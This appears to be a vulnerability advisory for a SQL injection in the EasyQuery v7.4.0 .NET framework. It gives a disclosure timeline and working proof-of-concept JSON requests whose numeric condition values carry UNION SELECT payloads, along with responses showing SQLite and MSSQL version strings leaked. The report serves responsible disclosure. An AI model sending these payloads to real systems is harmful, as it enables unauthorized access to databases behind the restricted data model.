| الوصف | EasyQuery v7.4.0 fails to escape/sanitize values provided in a numerical value condition when building SQL statements. The validation logic checking for numerical values is only implemented in the query builder UI. A modified request to the respective EasyQuery endpoints can be used to execute arbitrary SQL statements against the underlying database. This can be used to bypass any restrictions placed on EasyQuery via a constrained data model and to gain full access to the used data source.
This appears to be an issue in the shared parts of the framework as both the .NET Framework as well as the .NET Core example applications are affected.
##Affected Versions: up to (including) v7.4.0 - it is closed source and there are dozens of released versions
##Timeline:
- [8/19/2025] Details submitted to vendor (via their ticketing system)
- [8/20/2025] Acknowledgement from vendor, no ETA for patched version provided
- [8/29/2025] Asked vendor for ETA again, no response
##Vendor Contact
- https://korzh.com/
##Version history
- https://www.nuget.org/packages/Korzh.EasyQuery#versions-body-tab (Framework components are versioned and released in lockstep)
##Steps to recreate - using official example applications at https://github.com/easyquery/DotNetSamples
###.NET Core - using AdvancedSearch example project with its default SQLite backend
#### Request - /api/easyquery/models/nwind/fetch
{"query":{"modelId":"nwind","modelName":null,"id":"quer-frjls2yl2ls8i","name":"[New query]","cols":[{"id":"col-tg3ls2yzlekzd","cptn":"Product Name","expr":{"tag":2,"dtype":1,"id":"Product.Name","val":"Product.Name"}}],"justsortcols":[],"extraData":{},"innerData":{"aggr":{"groups":[],"ugt":false,"urc":false,"csg":false,"aggregates":[],"enabled":false}},"root":{"tag":51,"linking":3,"conds":[{"tag":1,"op":"Equal","exprs":[{"tag":2,"dtype":3,"id":"Product.UnitsInStock","val":"Product.UnitsInStock"},{"tag":1,"dtype":3,"kind":0,"val":"1) union select 'v' || sqlite_version() --","txt":"1"}]}]},"extraConds":{"tag":51,"linking":3,"conds":[]},"timezoneOffset":-60,"locale":"en-US"},"chunk":{"offset":0,"limit":1000,"needTotal":true},"data":{}}
###Response
{"success":true,"result":"ok","resultSet":{"cols":[{"id":"col-tg3ls2yzlekzd","isAggr":false,"label":"Product Name","description":null,"type":1,"originAttrId":"Product.Name","dfmt":"","gfct":null,"style":{"alignment":0,"allowAutoFormatting":false}}],"rows":[["v3.41.2"]]},"meta":{"totalRecords":1,"offset":0},"aux":{}}
###.NET Framework- using AdvancedSearch example project with its default MSSQL backend
#### Request - /api/easyquery/models/nwind/fetch
{"query":{"modelId":"nwind","modelName":null,"id":"quer-8v9ls33yc22be","name":"[New query]","cols":[{"id":"col-9e4ls33z8po5o","cptn":"Product Product Name","expr":{"tag":2,"dtype":1,"id":"Products.ProductName","val":"Products.ProductName"}}],"justsortcols":[],"extraData":{},"innerData":{"aggr":{"groups":[],"ugt":false,"urc":false,"csg":false,"aggregates":[],"enabled":false}},"root":{"tag":51,"linking":3,"conds":[{"tag":1,"op":"Equal","exprs":[{"tag":2,"dtype":3,"id":"Products.UnitsInStock","val":"Products.UnitsInStock"},{"tag":1,"dtype":3,"kind":0,"val":"1) union select @@version --","txt":"1"}]}]},"extraConds":{"tag":51,"linking":3,"conds":[]},"timezoneOffset":-60,"locale":"en-US"},"chunk":{"offset":0,"limit":1000,"needTotal":true},"data":{}}
#### Response
{"result":"ok","resultSet":{"cols":[{"id":"col-9e4ls33z8po5o","isAggr":false,"label":"Product Product Name","description":null,"type":1,"originAttrId":"Products.ProductName","dfmt":"","gfct":null,"style":{"alignment":0,"allowAutoFormatting":false}}],"rows":[["Microsoft SQL Server 2019 (RTM-CU27-GDR) (KB5040948) - 15.0.4382.1 (X64) \n\tJul 1 2024 20:03:23 \n\tCopyright (C) 2019 Microsoft Corporation\n\tExpress Edition (64-bit) on Windows 10 Home 10.0 <X64> (Build 26100: ) (Hypervisor)\n"]]},"meta":{"totalRecords":1,"offset":0}}
##
Many thanks for your awesome work!
|
|---|